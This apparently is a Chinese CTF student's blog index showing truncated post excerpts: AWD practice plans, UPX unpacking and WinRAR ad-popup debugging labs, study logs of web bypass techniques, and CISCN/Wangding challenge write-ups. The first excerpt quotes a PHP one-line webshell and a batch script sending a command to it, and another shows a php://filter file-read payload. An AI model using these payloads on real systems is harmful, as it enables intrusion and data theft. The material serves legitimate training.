最简短的一集,小时候看这集吓哭了 总共三道题,第一道题在网站根目录下有..php文件,内容如下 <?=@$_POST[9]=> 于是写个批量脚本,顺带一提其他靶机还不用扫ip,官方给 import requests url_list = ... data = { "9": "echo `cat /flag`" } for url in…
实验:使用ESP定律脱壳实验下载 实验步骤 1. PE文件基本信息分析 用Exeinfo对程序进行分析,发现是UPX加壳,版本在0.50到0.72之间点击scan/t,看到详细版本为0.7: 同时可以看到OEP为0007C037H,这实际上是UPX加壳后的软件的一个节的名称,不是真实的OEP 2. 手动脱壳基本原理 函数调用规范约定:cdelc,s…
周日(晚 听学长讲 ★下载安装awd要使用的软件 整理awd相关知识 ★完成角色分工并共同编写awd标准流程(防止不知道干什么、不知道怎么干 周一(晚 在bugku上进行awd模拟赛 复盘、学习相关知识 ★调整、添加awd标准流程 (自由安排) 周二(晚 在bugku上进行awd模拟赛 复盘、学习相关知识 ★调整、添加awd标准流程 (自由安排) …
复习了修改JWT内容以及破解JWT密钥的方式 复习了常用图片魔术文件头GIF98a 学习了python的pickle反序列化漏洞 学习了eval的闭合绕过 学习了反序列化复杂POP链的构造 学习了用短标签实现无字母webshell的绕过方式 学习了二次注入的判定与报错注入的使用方式 学习了数据库正则函数regexp的使用 学习了破解PHP随机数种子…
学习了正则首尾匹配的回溯次数超限和%0A绕过方法 学习了在命令位置被篡改的情况下通过whereis和find查找命令位置的方法 学习了通过数组绕过部分字符串函数的方法 学习了反序列化的截断逃逸 学习了data伪协议的构造与使用 学习了PHP函数basename无视非ascii字符的bug 学习了$_SERVER魔术变量获取的信息的差异 学习了url…
[CISCN2019 华北赛区 Day1 Web1]Dropbox 思路 注册登陆后,发现可以上传、下载文件,只能上传图片 下载文件的地方发现,是通过filename来索引的 可以先看源码 login.php // login.php <?php session_start(); if (isset($_SESSION['login'…
[网鼎杯 2020 白虎组]PicDown 思路 仅有一个输入框,输入当前题目的url进行测试发现其会传回一个包含当前网站信息的jpg文件该文件仅后缀为jpg,内容为url内容可以推断出这里是下载文件的用处 先对其进行协议测试,发现其支持data协议和http相关协议,不支持php和file协议直接输入/etc/passwd也能打开,说明可以直接读…
收录我不一定有时间看但是写的很好的,讲述知识点的文章 反弹shell:反弹shell - MustaphaMond - 博客园 (cnblogs.com) phar反序列化:利用 phar 拓展 php 反序列化漏洞攻击面 (seebug.org) mysql正则表达式:在group_concat过长,需要从某处开始(比如flag{)时,用正则匹配…
[CISCN2019 华北赛区 Day1 Web5]CyberPunk 思路 看源码看到传参file提示看WP知道原来是要传参伪协议读源码 /index.php?file=php://filter/convert.base64-encode/resource=index.php index.php <?php ini_set('open_ba…
实验:使用动态调试器分析WinRAR软件【x64dbg】下载 实验步骤 1. 观察分析目标的程序特征 广告窗口是非模态的,可以与其他窗口交互 2. 使用Spy++查看相关特征参数 3. 动态调试广告弹窗代码,定位启动代码调用点 看到使用的是CreateWindowExW 4. 添加API断点调试,查找广告弹窗代码 先添加API断点 然后断点调试,反…